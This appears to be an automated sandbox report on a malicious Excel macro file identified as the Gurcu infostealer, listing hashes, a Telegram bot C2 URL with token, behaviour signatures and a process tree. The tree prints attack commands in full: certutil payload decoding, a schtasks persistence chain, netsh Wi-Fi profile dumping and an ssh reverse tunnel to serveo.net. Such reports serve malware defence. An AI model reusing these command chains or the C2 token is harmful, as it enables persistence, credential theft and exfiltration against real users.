Analysis

  • max time kernel
    137s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-10-2024 10:57

General

  • Target

    e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm

  • Size

    201KB

  • MD5

    c595d96742a883a534ed1ca1f0d279d1

  • SHA1

    c465daa9e5bd998ef39c59f80f82f79cc75ce659

  • SHA256

    e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de

  • SHA512

    142506545388000aad69fbd9dabd62cb80b75fceb83cb8e31747a1c2de5495327fff2d4a6badabc691fb68df2361aa9f0a5adf969cf3f688b1f89959ca04538b

  • SSDEEP

    6144:+pQEXBxlv/9mIRzcZcD50SQBpDb8FJA7xqSWbLsE4D:+XBrv/AIRA6D5nQB5b8FJA7xGfsVD

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7761583635:AAGKfAalgYsBotuxvw8mb6qVnPPY4_337uo/sendMessage?chat_id=972119615

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Payload decoded via CertUtil.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3692
    • C:\Windows\System32\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7 C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
      2⤵
      • Process spawned unexpected child process
      • Deobfuscate/Decode Files or Information
      PID:1140
    • C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
      "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
          PID:2568
        • C:\Windows\system32\timeout.exe
          timeout /t 3
          4⤵
          • Delays execution with timeout.exe
          PID:5004
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1000
        • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
          "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:3812
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            5⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
              PID:4484
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:3708
            • C:\Windows\system32\findstr.exe
              findstr /R /C:"[ ]:[ ]"
              6⤵
              PID:2440
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4704
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
              PID:3192
            • C:\Windows\system32\netsh.exe
              netsh wlan show networks mode=bssid
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:2064
            • C:\Windows\system32\findstr.exe
              findstr "SSID BSSID Signal"
              6⤵
              PID:1432
          • C:\Windows\System32\OpenSSH\ssh.exe
            "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3068 serveo.net
            5⤵
            PID:3600
  • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
    C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:3712
  • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
    C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1828

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Of74e1e35dd903c3c23095278b7f18453a5.exe.log
    Filesize: 847B
    MD5: 3308a84a40841fab7dfec198b3c31af7
    SHA1: 4e7ab6336c0538be5dd7da529c0265b3b6523083
    SHA256: 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
    SHA512: 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

  • C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
    Filesize: 135KB
    MD5: 410bd9796a48df659618b405cdcedced
    SHA1: b87887753569673a6a3ea8ad568e0174c214f1ff
    SHA256: 9c5701ef66f03629131a476381865069d0cf78bed20fab2725d04c2f9471af5f
    SHA512: 1441142e9ade59fcea06afa43033ead028c68f0b5d420ded9fbd4b2c6fdcdd16bb002a58a87a4d637c7df70e1a5d680367be2bd8cc24e6e7346247d3587c9f5e

  • C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7
    Filesize: 180KB
    MD5: b2d32fe2797534b941688bc919d564fd
    SHA1: 7949b2d8e9e1d5c1e84618e10d61b615e0376676
    SHA256: 5331e34ca1acf5576ce551607ecf5bf4430078e08a02bd940bab501bcb62135c
    SHA512: 13b598897c35adfa09cf4664a20cf38bbde4968c2961691bff9e772c8ec6c5e97b241525fb39bffbeb02fa9bcde132897e3be3372c428d80529c89827bb70596

  • C:\Users\Admin\AppData\Local\csxe3bn6se\p.dat
    Filesize: 4B
    MD5: f5496252609c43eb8a3d147ab9b9c006
    SHA1: 03f8cd2c9e12b97fed00427c6d66da173468a1f9
    SHA256: e12868d1f3963e0e1129b3a6442b6d3d7d8e4eb7e27d34348b29523f0ae37748
    SHA512: 9caa41d81e9539b9584e310a8cbc6acfc0ada1ed953856ae1d3e75fc1891bf048ab1accf85788208080605f387e225d4c11452e93aa4a5c9fe96a24631e56a2f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize: 1KB
    MD5: d95b6d405d530b8a81383dfd382cc1af
    SHA1: 79072d3de481abd26391c933f6b226b9fb4aa599
    SHA256: 795b2bac028fd471a5c2b0e4240e3cd1b3d220529b8c878c70053ff28b04d5e1
    SHA512: c08c23d2de951a52f270e3b79fc51192b0e7f7631ff2089e68d2354e81ecb4d18114e445bd26acf08520ab0e7934ee34dbfedfe1d4b1bdf7eccad2619a305a8c

  • memory/2284-37-0x000001C43A8C0000-0x000001C43A8E8000-memory.dmp
    Filesize: 160KB

  • memory/3692-7-0x00007FF875C10000-0x00007FF875C20000-memory.dmp
    Filesize: 64KB

  • memory/3692-25-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-15-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp
    Filesize: 64KB

  • memory/3692-16-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp
    Filesize: 64KB

  • memory/3692-14-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-13-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-12-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-11-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-10-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-9-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-8-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-0-0x00007FF875C10000-0x00007FF875C20000-memory.dmp
    Filesize: 64KB

  • memory/3692-26-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-27-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-5-0x00007FF875C10000-0x00007FF875C20000-memory.dmp
    Filesize: 64KB

  • memory/3692-6-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-4-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-2-0x00007FF875C10000-0x00007FF875C20000-memory.dmp
    Filesize: 64KB

  • memory/3692-46-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-47-0x00007FF8B5C2D000-0x00007FF8B5C2E000-memory.dmp
    Filesize: 4KB

  • memory/3692-53-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp
    Filesize: 2.0MB

  • memory/3692-3-0x00007FF875C10000-0x00007FF875C20000-memory.dmp
    Filesize: 64KB

  • memory/3692-1-0x00007FF8B5C2D000-0x00007FF8B5C2E000-memory.dmp
    Filesize: 4KB